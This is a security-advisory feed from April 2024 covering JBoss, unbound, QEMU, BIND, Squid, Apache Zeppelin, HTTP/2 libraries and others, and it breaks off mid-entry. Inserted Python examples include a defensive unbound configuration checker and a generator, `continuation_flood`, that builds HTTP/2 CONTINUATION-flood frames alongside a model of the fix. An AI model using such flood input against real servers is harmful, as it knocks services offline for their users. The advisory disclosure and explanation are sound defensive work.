A flaw was found in JBoss EAP. When an OIDC app that serves multiple tenants attempts to access the second tenant, it should prompt the user to log in again, since the second tenant is secured with a different OIDC configuration. The underlying issue is in OidcSessionTokenStore when determining whether a cached token should be used or not. This logic needs to be updated to take into account the new "provider-url" option in addition to the "realm" option.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JPMX-996V-48FM

10.04.2024 16:40:08 | ubuntu | [USN-6727-1] NSS vulnerabilities (medium)
Several security issues were fixed in NSS.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6727-1

10.04.2024 15:24:42 | ubuntu | [USN-6719-2] util-linux vulnerability
util-linux could be made to expose sensitive information.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6719-2

10.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1750] unbound security update (important)
[1.16.2-3.5]
- Rebuilt again with z-stream target
[1.16.2-3.4]
- Correct typo in new config file
[1.16.2-3.3]
- Ensure group access correction reaches also updated configs (CVE-2024-1488)
[1.16.2-3.2]
- Ensure only unbound group can change configuration (CVE-2024-1488)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1750

10.04.2024 03:00:00 | oraclelinux | [ELSA-2024-12276] virt:kvm_utils3 security update (moderate)
hivex
libguestfs
libguestfs-winsupport
[8.9-1]
- Rebase to ntfs-3g 2022.10.3
- Fixes: CVE-2022-40284
- resolves: rhbz#2236372
libiscsi
libnbd
libtpms
libvirt
[9.0.0-5]
- Fix off-by-one error in udevListInterfacesByStatus (Martin Kletzander) [Orabug: 36364464] {CVE-2024-1441}
libvirt-dbus
libvirt-python
[9.0.0-5]
- Update to libvirt 9.0.0-5 (Karl Heubaum)
nbdkit
netcf
perl-Sys-Virt
qemu-kvm
[7.2.0-11]
- vfio/migration: Add a note about migration rate limiting (Avihai Horon) [Orabug: 36329758]
- vfio/migration: Refactor vfio_save_state() return value (Avihai Horon) [Orabug: 36329758]
- migration: Don't serialize devices in qemu_savevm_state_iterate() (Avihai Horon) [Orabug: 36329758]
- ui/clipboard: add asserts for update and request (Fiona Ebner) [Orabug: 36323175] {CVE-2023-6683}
- ui/clipboard: mark type as not available when there is no data (Fiona Ebner) [Orabug: 36323175] {CVE-2023-6683}
- virtio-net: correctly copy vnet header when flushing TX (Jason Wang) [Orabug: 36154459] {CVE-2023-6693}
- esp: restrict non-DMA transfer length to that of available data (Mark Cave-Ayland) [Orabug: 36322141] {CVE-2024-24474}
- vhost: Perform memory section dirty scans once per iteration (Si-Wei Liu)
- vhost: dirty log should be per backend type (Si-Wei Liu)
- net: Update MemReentrancyGuard for NIC (Akihiko Odaki) [Orabug: 35644197] {CVE-2023-3019}
- net: Provide MemReentrancyGuard * to qemu_new_nic() (Akihiko Odaki) [Orabug: 35644197] {CVE-2023-3019}
- lsi53c895a: disable reentrancy detection for MMIO region, too (Thomas Huth) [Orabug: 33774027] {CVE-2021-3750}
- memory: stricter checks prior to unsetting engaged_in_io (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- async: avoid use-after-free on re-entrancy guard (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- apic: disable reentrancy detection for apic-msi (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- raven: disable reentrancy detection for iomem (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- bcm2835_property: disable reentrancy detection for iomem (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- lsi53c895a: disable reentrancy detection for script RAM (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- hw: replace most qemu_bh_new calls with qemu_bh_new_guarded (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- checkpatch: add qemu_bh_new/aio_bh_new checks (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- async: Add an optional reentrancy guard to the BH API (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- memory: prevent dma-reentracy issues (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}
- hw/acpi: propagate vcpu hotplug after switch to modern interface (Aaron Young)
- migration: Fix use-after-free of migration state object (Fabiano Rosas) [Orabug: 36242218]
- kvm: Fix crash due to access uninitialized kvm_state (Gavin Shan) [Orabug: 36269244]
- migration: Avoid usage of static variable inside tracepoint (Joao Martins)
- migration: Add tracepoints for downtime checkpoints (Peter Xu)
- migration: migration_stop_vm() helper (Peter Xu)
- migration: Add per vmstate downtime tracepoints (Peter Xu)
- migration: Add migration_downtime_start|end() helpers (Peter Xu)
- migration: Set downtime_start even for postcopy (Peter Xu)
- hv-balloon: implement pre-Glib 2.68 compatibility (Maciej S. Szmigiero)
- hw/i386/pc: Support hv-balloon (Maciej S. Szmigiero)
- qapi: Add HV_BALLOON_STATUS_REPORT event and its QMP query command (Maciej S. Szmigiero)
- qapi: Add query-memory-devices support to hv-balloon (Maciej S. Szmigiero)
- Add Hyper-V Dynamic Memory Protocol driver (hv-balloon) hot-add support (Maciej S. Szmigiero)
- Add Hyper-V Dynamic Memory Protocol driver (hv-balloon) base (Maciej S. Szmigiero)
- Add Hyper-V Dynamic Memory Protocol definitions (Maciej S. Szmigiero)
- memory-device: Drop size alignment check (David Hildenbrand)
- memory-device: Support empty memory devices (David Hildenbrand)
- memory,vhost: Allow for marking memory device memory regions unmergeable (David Hildenbrand)
- memory: Clarify mapping requirements for RamDiscardManager (David Hildenbrand)
- memory-device,vhost: Support automatic decision on the number of memslots (David Hildenbrand)
- vhost: Add vhost_get_max_memslots() (David Hildenbrand)
- kvm: Add stub for kvm_get_max_memslots() (David Hildenbrand)
- memory-device,vhost: Support memory devices that dynamically consume memslots (David Hildenbrand)
- memory-device: Track required and actually used memslots in DeviceMemoryState (David Hildenbrand)
- stubs: Rename qmp_memory_device.c to memory_device.c (David Hildenbrand)
- memory-device: Support memory devices with multiple memslots (David Hildenbrand)
- vhost: Return number of free memslots (David Hildenbrand)
- kvm: Return number of free memslots (David Hildenbrand)
- vhost: Remove vhost_backend_can_merge() callback (David Hildenbrand)
- vhost: Rework memslot filtering and fix 'used_memslot' tracking (David Hildenbrand)
- virtio-md-pci: New parent type for virtio-mem-pci and virtio-pmem-pci (David Hildenbrand)
- migration/ram: Expose ramblock_is_ignored() as migrate_ram_is_ignored() (David Hildenbrand)
- virtio-mem: Skip most of virtio_mem_unplug_all() without plugged memory (David Hildenbrand)
- softmmu/physmem: Warn with ram_block_discard_range() on MAP_PRIVATE file mapping (David Hildenbrand)
- memory-device: Track used region size in DeviceMemoryState (David Hildenbrand)
- memory-device: Refactor memory_device_pre_plug() (David Hildenbrand)
- hw/i386/pc: Remove PC_MACHINE_DEVMEM_REGION_SIZE (David Hildenbrand)
- hw/i386/acpi-build: Rely on machine->device_memory when building SRAT (David Hildenbrand)
- hw/i386/pc: Use machine_memory_devices_init() (David Hildenbrand)
- hw/loongarch/virt: Use machine_memory_devices_init() (David Hildenbrand)
- hw/ppc/spapr: Use machine_memory_devices_init() (David Hildenbrand)
- hw/arm/virt: Use machine_memory_devices_init() (David Hildenbrand)
- memory-device: Introduce machine_memory_devices_init() (David Hildenbrand)
- memory-device: Unify enabled vs. supported error messages (David Hildenbrand)
- hw/scsi/scsi-disk: Disallow block sizes smaller than 512 [CVE-2023-42467] (Thomas Huth) [Orabug: 35808564] {CVE-2023-42467}
- tests/qtest: ahci-test: add test exposing reset issue with pending callback (Fiona Ebner) [Orabug: 35977245] {CVE-2023-5088}
- hw/ide: reset: cancel async DMA operation before resetting state (Fiona Ebner) [Orabug: 35977245] {CVE-2023-5088}
seabios
sgabios
supermin
swtpm
virt-v2v
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12276

10.04.2024 03:00:00 | redhat | [RHSA-2024:1750] unbound security update (important)
The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.

Security Fix(es):

* A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. The default combination of the "control-use-cert: no" option with either explicit or implicit use of an IP address in the "control-interface" option could allow improper access. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged local process to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.

To mitigate the vulnerability, a new file "/etc/unbound/conf.d/remote-control.conf" has been added and included in the main unbound configuration file, "unbound.conf". The file contains two directives that should limit access to unbound.conf:

control-interface: "/run/unbound/control"
control-use-cert: "yes"

For details about these directives, run "man unbound.conf".

Updating to the version of unbound provided by this advisory should, in most cases, address the vulnerability. To verify that your configuration is not vulnerable, use the "unbound-control status | grep control" command. If the output contains "control(ssl)" or "control(namedpipe)", your configuration is not vulnerable. If the command output returns only "control", the configuration is vulnerable because it does not enforce access only to the unbound group members. To fix your configuration, add the line "include: /etc/unbound/conf.d/remote-control.conf" to the end of the file "/etc/unbound/unbound.conf". If you use a custom "/etc/unbound/conf.d/remote-control.conf" file, add the new directives to this file. (CVE-2024-1488)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1750

11.04.2024 01:00:53 | maven | [MAVEN:GHSA-QMR3-52XF-WMHX] Apache Zeppelin: LDAP search filter query Injection Vulnerability (moderate)
Improper Input Validation vulnerability in Apache Zeppelin. The attackers can execute malicious queries by setting improper configuration properties to LDAP search filter. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QMR3-52XF-WMHX

11.04.2024 01:00:41 | maven | [MAVEN:GHSA-G44M-X5H7-FR5Q] Apache Zeppelin: Cron arbitrary user impersonation with improper privileges (moderate)
Improper Input Validation vulnerability in Apache Zeppelin. The attackers can call updating cron API with invalid or improper privileges so that the notebook can run with the privileges. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G44M-X5H7-FR5Q

10.04.2024 11:54:24 | almalinux | [ALSA-2024:1719] rear security update (moderate)
rear security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1719

10.04.2024 17:16:19 | almalinux | [ALSA-2024:1690] varnish security update (important)
varnish security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1690

10.04.2024 21:19:12 | npm | [NPM:GHSA-VC6Q-CCJ9-9R89] MailDev Remote Code Execution (critical)
MailDev 2 through 2.1.0 allows Remote Code Execution via a crafted Content-ID header for an e-mail attachment, leading to `lib/mailserver.js` writing arbitrary code into the `routes.js` file.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VC6Q-CCJ9-9R89

12.04.2024 02:02:32 | ubuntu | [USN-6730-1] Apache Maven Shared Utils vulnerability (critical)
maven-shared-utils could be made to run programs if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6730-1

12.04.2024 00:30:32 | npm | [NPM:GHSA-X565-32QP-M3VF] phin may include sensitive headers in subsequent requests after redirect (moderate)

### Impact

Users may be impacted if sending requests including sensitive data in specific headers with `followRedirects` enabled.

### Patches

The [follow-redirects](https://github.com/follow-redirects/follow-redirects) library is now being used for redirects and removes some headers that may contain sensitive information in some situations.

### Workarounds

N/A. Please update to resolve the issue.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-X565-32QP-M3VF

11.04.2024 23:17:56 | npm | [NPM:GHSA-WM4W-7H2Q-3PF7] Matrix IRC Bridge truncated content of messages can be leaked (moderate)

### Impact

The matrix-appservice-irc before version 2.0.0 can be exploited to leak the truncated body of a message if a malicious user sends a Matrix reply to an event ID they don't have access to. As a precondition to the attack, the malicious user needs to know the event ID of the message they want to leak, as well as to be joined to both the Matrix room and the IRC channel it is bridged to. The message reply containing the leaked message content is visible to IRC channel members when this happens.

### Patches

matrix-appservice-irc 2.0.0 checks whether the user has permission to view an event before constructing a reply. Administrators should upgrade to this version.

### Workarounds

It's possible to limit the amount of information leaked by setting a reply template that doesn't contain the original message. See [these lines](https://github.com/matrix-org/matrix-appservice-irc/blob/d5d67d1d3ea3f0f6962a0af2cc57b56af3ad2129/config.sample.yaml#L601-L604) in the configuration file.

### References

https://github.com/matrix-org/matrix-appservice-irc/pull/1799

### For more information

If you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WM4W-7H2Q-3PF7

11.04.2024 21:18:01 | ubuntu | [USN-6727-2] NSS regression
USN-6727-1 introduced a regression in NSS.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6727-2

11.04.2024 19:19:44 | ubuntu | [USN-6729-1] Apache HTTP Server vulnerabilities
Several security issues were fixed in Apache HTTP Server.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6729-1

11.04.2024 14:13:39 | ubuntu | [USN-6728-2] Squid regression
USN-6728-1 introduced a regression in Squid.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6728-2

11.04.2024 03:00:00 | cisa | [CISA-2024:0411] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (critical)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0411

11.04.2024 03:00:00 | debian | [DSA-5656-1] chromium
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5656-1

11.04.2024 03:00:00 | redhat | [RHSA-2024:1784] gnutls security update (moderate)
The gnutls package provides the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS. This package update fixes a timing side-channel in deterministic ECDSA.

Security Fix(es):

* gnutls: vulnerable to Minerva side-channel information leak (CVE-2024-28834)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1784

11.04.2024 03:00:00 | redhat | [RHSA-2024:1786] httpd:2.4/mod_http2 security update (important)
The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

Security Fix(es):

* httpd: mod_http2: CONTINUATION frames DoS (CVE-2024-27316)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1786

11.04.2024 03:00:00 | redhat | [RHSA-2024:1785] X.Org server security update (important)
X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.

Security Fix(es):

* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)
* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)
* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1785

11.04.2024 03:00:00 | redhat | [RHSA-2024:1787] squid security update (important)
Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.

Security Fix(es):

* squid: denial of service in HTTP header parser (CVE-2024-25617)
* squid: denial of service in HTTP request parsing (CVE-2023-50269)
* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)
* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)
* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)
* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1787

11.04.2024 03:00:00redhat[RHSA-2024:1751] unbound security update (important)The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. The default combination of the "control-use-cert: no" option with either explicit or implicit use of an IP address in the "control-interface" option could allow improper access. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged local process to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file "/etc/unbound/conf.d/remote-control.conf" has been added and included in the main unbound configuration file, "unbound.conf". The file contains two directives that limit access to the remote-control interface: control-interface: "/run/unbound/control" control-use-cert: "yes"For details about these directives, run "man unbound.conf".Updating to the version of unbound provided by this advisory should, in most cases, address the vulnerability. To verify that your configuration is not vulnerable, run "unbound-control status | grep control". If the output contains "control(ssl)" or "control(namedpipe)", your configuration is not vulnerable. If the output contains only "control", the configuration is vulnerable because it does not restrict access to members of the unbound group. To fix your configuration, add the line "include: /etc/unbound/conf.d/remote-control.conf" to the end of the file "/etc/unbound/unbound.conf". If you use a custom "/etc/unbound/conf.d/remote-control.conf" file, add the new directives to this file. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1751
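The verification and repair steps in the advisory above, as an added example that is not code from Red Hat or the unbound project: `classify_control` applies the advisory's rule to captured `unbound-control status` output, `config_is_hardened` inspects unbound.conf text for the include line or the two directives, and `harden_config` appends the include once. The status output and the vulnerable configuration are constructed samples, not captures from a real host.

```python
import re

# Added example, not code from the Red Hat advisory or the unbound project. It turns the
# advisory's manual check for CVE-2024-1488 into functions that classify captured
# `unbound-control status` output and inspect or amend unbound.conf text. The sample
# status output and configuration below are constructed, not captured from a real host.

SAFE_STATUS = """version: 1.16.2
verbosity: 1
threads: 2
options: control(ssl)
unbound (pid 1234) is running...
"""
VULNERABLE_STATUS = SAFE_STATUS.replace("control(ssl)", "control")

# Constructed vulnerable remote-control stanza: control on a TCP address, certificates off.
VULNERABLE_CONF = """server:
    interface: 127.0.0.1
remote-control:
    control-enable: yes
    control-interface: 127.0.0.1
    control-use-cert: no
"""

INCLUDE_LINE = "include: /etc/unbound/conf.d/remote-control.conf"
HARDENED_FILE = "/etc/unbound/conf.d/remote-control.conf"
UNIX_SOCKET = "/run/unbound/control"

_DIRECTIVE = re.compile(
    r'^[ \t]*(control-interface|control-use-cert|include):[ \t]*"?([^"\s]+)"?', re.M)


def classify_control(status_output: str) -> str:
    """Apply the advisory's rule to `unbound-control status` output.

    'safe'       -> control(ssl) or control(namedpipe) is in effect
    'vulnerable' -> a bare 'control' (plain TCP, no certificate check)
    'unknown'    -> no control entry at all (remote control may be disabled)
    """
    lines = [l for l in status_output.splitlines() if "control" in l]
    if not lines:
        return "unknown"
    if any("control(ssl)" in l or "control(namedpipe)" in l for l in lines):
        return "safe"
    return "vulnerable"


def config_is_hardened(conf_text: str) -> bool:
    """True if the configuration pulls in the advisory's include file, or itself
    binds the control channel to the unix socket and requires certificates."""
    found = {}
    for key, value in _DIRECTIVE.findall(conf_text):
        found.setdefault(key, []).append(value)
    if HARDENED_FILE in found.get("include", []):
        return True
    # Any extra control-interface value (e.g. 127.0.0.1) would keep TCP control open,
    # so the socket must be the only interface configured.
    return (found.get("control-use-cert") == ["yes"]
            and found.get("control-interface") == [UNIX_SOCKET])


def harden_config(conf_text: str) -> str:
    """Append the include line the advisory recommends, once, if it is missing."""
    if config_is_hardened(conf_text):
        return conf_text
    return conf_text.rstrip("\n") + "\n" + INCLUDE_LINE + "\n"


if __name__ == "__main__":
    print("status:", classify_control(SAFE_STATUS), classify_control(VULNERABLE_STATUS))
    print("config:", config_is_hardened(VULNERABLE_CONF),
          config_is_hardened(harden_config(VULNERABLE_CONF)))
```

`config_is_hardened` deliberately requires the unix socket to be the only `control-interface` value: a configuration that adds the socket but keeps a TCP address as well still exposes the unauthenticated port the advisory describes.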
11.04.2024 03:00:00redhat[RHSA-2024:1781] bind9.16 security update (important)The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)* bind9: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)* bind9: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)* bind9: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1781
11.04.2024 03:00:00redhat[RHSA-2024:1789] bind security update (important)The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)* bind: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)* bind: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1789
11.04.2024 03:00:00freebsd[FREEBSD:DAD6294C-F7C1-11EE-BB77-001B217B3468] Gitlab -- Patch Release: 16.10.2, 16.9.4, 16.8.6Gitlab reports: Stored XSS injected in diff viewer Stored XSS via autocomplete results Redos on Integrations Chat Messages Redos During Parse Junit Test Reporthttps://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:DAD6294C-F7C1-11EE-BB77-001B217B3468
11.04.2024 23:13:40maven[MAVEN:GHSA-66J8-C83M-GJ5F] Apache Zeppelin remote code execution by adding malicious JDBC connection string (critical)Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin.The attacker can inject sensitive configuration or malicious code when connecting to a MySQL database via the JDBC driver. This issue affects Apache Zeppelin: before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-66J8-C83M-GJ5F
11.04.2024 23:13:14maven[MAVEN:GHSA-RRVF-5W4R-3X7V] Apache Zeppelin vulnerable to cross-site scripting in the helium module (moderate)Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.Attackers can modify `helium.json` and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RRVF-5W4R-3X7V
11.04.2024 03:00:00freebsd[FREEBSD:7C217849-F7D7-11EE-A490-84A93843EB75] OpenSSL -- Unbounded memory growth with session handling in TLSv1.3The OpenSSL project reports: Some non-default TLS server configurations can cause unbounded memory growth when processing TLSv1.3 sessionshttps://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:7C217849-F7D7-11EE-A490-84A93843EB75
11.04.2024 03:00:00freebsd[FREEBSD:C092BE0E-F7CC-11EE-AA6B-B42E991FC52E] forgejo -- HTTP/2 CONTINUATION flood in net/http security@golang.org reports: An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C092BE0E-F7CC-11EE-AA6B-B42E991FC52E
11.04.2024 19:16:20rustsec[RUSTSEC-2024-0332] Degradation of service in h2 servers with CONTINUATION FloodAn attacker can send a flood of CONTINUATION frames, causing `h2` to process them indefinitely. This results in an increase in CPU usage. Tokio task budget helps prevent this from a complete denial-of-service, as the server can still respond to legitimate requests, albeit with increased latency. More details at https://seanmonstar.com/blog/hyper-http2-continuation-flood/. Patches are available for the 0.4.x and 0.3.x versions.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0332
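The CONTINUATION flood described in the two advisories above (Go net/http and the Rust `h2` crate), as an added example that is not code from either project: `continuation_flood` builds the attacker's byte stream (a HEADERS frame followed by CONTINUATION frames that never carry END_HEADERS), and `read_header_block` models the receiving side both before the fix (excess header bytes parsed without bound) and after it (parsing stops at a bound and the connection is closed). The frame layout is HTTP/2's; the payloads are constructed filler, not valid HPACK, because only the frame accounting is modelled.

```python
import struct

# Added example, not code from Go's net/http, forgejo or the h2 crate. It builds the frame
# sequence the advisory describes (a HEADERS frame followed by CONTINUATION frames that
# never carry END_HEADERS) and models the server side before and after the fix: keep
# parsing excess header bytes without bound, or stop after a limit and close the
# connection. Frame layout is HTTP/2's 9-byte header (24-bit length, type, flags, 31-bit
# stream id). The payloads are constructed filler rather than valid HPACK, since only the
# frame accounting is modelled here.

HEADERS, CONTINUATION = 0x1, 0x9
END_HEADERS = 0x4


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """Serialise one HTTP/2 frame."""
    header = (struct.pack(">I", len(payload))[1:]           # 24-bit length
              + bytes([ftype, flags])
              + struct.pack(">I", stream_id & 0x7FFFFFFF))  # R bit cleared
    return header + payload


def continuation_flood(stream_id: int, n_frames: int, frag_size: int) -> bytes:
    """Attacker's byte stream: an open header block plus n_frames CONTINUATION frames."""
    frag = b"\x00" * frag_size                            # constructed filler, not HPACK
    out = bytearray(frame(HEADERS, 0, stream_id, frag))   # no END_HEADERS
    for _ in range(n_frames):
        out += frame(CONTINUATION, 0, stream_id, frag)    # still no END_HEADERS
    return bytes(out)


def read_header_block(data: bytes, max_header_bytes: int, max_excess_bytes=None):
    """Consume a HEADERS + CONTINUATION sequence the way a server would.

    Returns (status, stored, excess): `stored` is what fits under max_header_bytes,
    `excess` is what was parsed but never kept. max_excess_bytes=None is the pre-fix
    behaviour (excess parsed without bound); a number is the fixed behaviour, which
    returns 'closed' once the bound is exceeded.
    """
    stored = excess = pos = 0
    while pos + 9 <= len(data):
        length = int.from_bytes(data[pos:pos + 3], "big")
        ftype, flags = data[pos + 3], data[pos + 4]
        if ftype not in (HEADERS, CONTINUATION):
            raise ValueError("unexpected frame type inside a header block")
        if pos + 9 + length > len(data):
            raise ValueError("truncated frame")
        pos += 9 + length
        take = min(max(max_header_bytes - stored, 0), length)
        stored += take
        excess += length - take          # decoded (HPACK) but discarded by a real server
        if max_excess_bytes is not None and excess > max_excess_bytes:
            return "closed", stored, excess
        if flags & END_HEADERS:
            return "complete", stored, excess
    return "unterminated", stored, excess


if __name__ == "__main__":
    flood = continuation_flood(1, n_frames=2000, frag_size=1024)
    for bound in (None, 32 * 1024):
        status, stored, excess = read_header_block(flood, 16 * 1024, bound)
        print(f"excess bound={bound}: {status}, stored={stored}, parsed-and-dropped={excess}")
```

With no bound the parser works through the entire stream for a request it will reject anyway; with a bound the work per doomed request is capped at `max_header_bytes + max_excess_bytes` plus one frame, which is the property the fixes in both advisories provide.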
12.04.2024 22:36:41slackware[SSA:2024-103-01] php (medium)New php packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```extra/php81/php81-8.1.28-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Command injection via array-ish $command parameter of XXXXXXXXX. __Host-/__Secure- cookie bypass due to partial CVE-2022-31629 fix. Password_verify can erroneously return true, opening ATO risk. For more information, see: https://www.php.net/ChangeLog-8.php#8.1.28 https://www.cve.org/CVERecord?id=CVE-2024-1874 https://www.cve.org/CVERecord?id=CVE-2024-2756 https://www.cve.org/CVERecord?id=CVE-2024-3096 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/php81/php81-8.1.28-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/php81/php81-8.1.28-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-8.3.6-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-8.3.6-x86_64-1.txz**MD5 signatures**Slackware 15.0 package:912a70b605290d9fa79ac11089f232f3 php81-8.1.28-i586-1_slack15.0.txzSlackware x86_64 15.0 package:bbf7d8260161db99e343e17ae6c52bd9 